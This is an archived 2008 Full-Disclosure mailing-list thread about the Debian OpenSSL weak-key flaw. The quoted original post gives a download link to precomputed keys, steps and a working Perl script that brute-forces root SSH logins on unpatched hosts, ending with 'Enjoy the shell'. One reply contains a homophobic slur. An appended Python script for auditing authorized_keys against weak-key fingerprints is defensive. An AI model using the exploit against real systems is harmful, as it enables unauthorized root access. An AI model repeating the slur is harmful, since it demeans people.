Why reinvent the wheel?

On Mon, May 19, 2008 at 6:20 AM, reepex <[EMAIL PROTECTED]> wrote:
> why don't you code it yourself instead of being a script kiddie faggot. and
> don't use ";-)" to look cool when you beg for warez.
>
> On Sun, May 18, 2008 at 10:13 AM, bob harley <[EMAIL PROTECTED]> wrote:
>>
>> Anyone have a copy of rsa.2048.tar.bzip2? The web server isn't playing
>> nicely  ;-)
>>
>> On Thu, May 15, 2008 at 2:35 AM, Markus Müller <[EMAIL PROTECTED]> wrote:
>>>
>>> Hi full-disclosure,
>>>
>>> the Debian OpenSSL issue means that there are only 65.536 possible SSH
>>> keys generated, because the only entropy is the PID of the process
>>> generating the key.
>>>
>>> This means that the following Perl script can be used with the
>>> precalculated SSH keys to brute force the SSH login. It works if such a
>>> key is installed on a non-patched Debian or any other system manually
>>> configured to.
>>>
>>> On an unpatched system, which doesn't need to be Debian, do the
>>> following:
>>>
>>> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
>>>
>>> 2. Extract it to a directory
>>>
>>> 3. Enter into the /root/.ssh/authorized_keys an SSH RSA key with 2048
>>> bits, generated on an unpatched Debian (this is the key this exploit will
>>> break)
>>>
>>> 4. Run the perl script and give it the location to where you extracted
>>> the bzip2 mentioned.
>>>
>>> #!/usr/bin/perl
>>> my $keysPerConnect = 6;
>>> unless ($ARGV[1]) {
>>>   print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
>>>   print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
>>>   print "By [EMAIL PROTECTED]";
>>>   exit 0;
>>> }
>>> chdir($ARGV[0]);
>>> opendir(A, $ARGV[0]) || die("opendir");
>>> while ($_ = readdir(A)) {
>>>   chomp;
>>>   next unless m,^\d+$,;
>>>   push(@a, $_);
>>>   if (scalar(@a) > $keysPerConnect) {
>>>      system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
>>> ".$_ } @a)." ".$ARGV[1]);
>>>      @a = ();
>>>   }
>>> }
>>>
>>> 5. Enjoy the shell after some minutes (less than 20 minutes)
>>>
>>> Regards,
>>> Markus Mueller
>>> [EMAIL PROTECTED]
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/



-- 
Ronald van der Westen
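
Because the quoted post describes a key space small enough to precompute, the same property lets an administrator audit `authorized_keys` files against a list of fingerprints of those keys. The sketch below is an added example, not code from the thread: the fingerprint format (SHA-256 hex of the key blob), the function names and the sample data are assumptions constructed for illustration.

```python
import base64, binascii, hashlib, struct

KEY_TYPES = {"ssh-rsa", "ssh-dss"}  # key types audited here (assumption)

def split_fields(line):
    """Split on whitespace, keeping quoted option values (command="a b") whole."""
    fields, cur, quoted, prev = [], "", False, ""
    for ch in line:
        if ch == '"' and prev != "\\":
            quoted = not quoted
        if ch.isspace() and not quoted:
            fields.append(cur)
            cur = ""
        else:
            cur += ch
        prev = ch
    return [f for f in fields + [cur] if f]

def fingerprint(blob):  # assumption: blacklist holds SHA-256 hex of the key blob
    return hashlib.sha256(blob).hexdigest()

def classify(fields, weak):
    # The key type is field 0, or field 1 when an options field precedes it.
    i = next((k for k, f in enumerate(fields[:2]) if f in KEY_TYPES), None)
    if i is None or i + 1 >= len(fields):
        return "skipped", None
    try:
        blob = base64.b64decode(fields[i + 1], validate=True)
    except (binascii.Error, ValueError):
        return "bad-base64", None
    # The blob starts with uint32 length + type name; it must match the line.
    n = struct.unpack(">I", blob[:4])[0] if len(blob) >= 4 else 0
    if blob[4:4 + n] != fields[i].encode():
        return "type-mismatch", None
    fp = fingerprint(blob)
    return ("WEAK" if fp in weak else "ok"), fp

def audit(text, weak):
    rows = ((no, split_fields(l.strip())) for no, l in enumerate(text.splitlines(), 1))
    return [(no, *classify(f, weak)) for no, f in rows if f and not f[0].startswith("#")]

def sample_b64(seed):  # constructed stand-in for a key blob, not a real key
    blob = struct.pack(">I", 7) + b"ssh-rsa" + hashlib.sha256(seed).digest()
    return blob, base64.b64encode(blob).decode()

WEAK_BLOB, WEAK_B64 = sample_b64(b"weak-1")
WEAK = {fingerprint(WEAK_BLOB)}  # constructed blacklist with one entry
SAMPLE = ("# admin keys\nssh-rsa " + WEAK_B64 + " root@old\n"
          'command="/bin/backup --all",no-pty ssh-rsa ' + sample_b64(b"good")[1] + " backup\n"
          "ssh-rsa not*base64 broken\n")
```

Calling `audit(SAMPLE, WEAK)` returns one `(line number, status, fingerprint)` tuple per key line; any `WEAK` row marks a key to remove and replace.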
